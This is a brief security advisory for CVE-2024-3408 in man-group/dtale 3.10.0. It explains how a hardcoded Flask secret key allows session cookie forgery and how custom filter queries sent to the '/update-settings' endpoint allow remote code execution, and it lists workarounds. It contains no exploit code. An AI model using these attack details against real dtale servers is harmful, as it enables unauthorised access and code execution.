CVE-2024-3408

Name of the Vulnerable Software and Affected Versions man-group/dtale version 3.10.0

Description The issue arises from improper input validation, leading to an authentication bypass and remote code execution (RCE). A hardcoded SECRET KEY in the flask configuration allows attackers to forge a session cookie if authentication is enabled. Additionally, the application fails to properly restrict custom filter queries, enabling attackers to execute arbitrary code on the server by bypassing the restriction on the "/update-settings" endpoint, even when enable custom filters is not enabled. This allows attackers to bypass authentication mechanisms and execute remote code on the server.

Recommendations For man-group/dtale version 3.10.0, as a temporary workaround, consider disabling the enable custom filters feature and restricting access to the "/update-settings" endpoint until a patch is available. Additionally, changing the hardcoded SECRET KEY in the flask configuration can help mitigate the risk of session cookie forgery. At the moment, there is no information about a newer version that contains a fix for this vulnerability.